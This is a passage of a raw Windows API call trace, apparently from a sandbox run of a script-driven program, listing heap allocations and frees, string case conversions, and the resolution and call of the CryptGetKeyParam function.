returned 0x8ded30 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0185.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.904] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0185.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.905] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.906] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0185.906] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0185.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.907] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0185.907] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0185.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0185.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0185.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0185.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0185.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0185.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0185.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0185.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0185.909] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0185.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0185.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.910] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0185.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0185.911] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0185.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.913] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0185.913] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2798, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2798*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0185.913] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 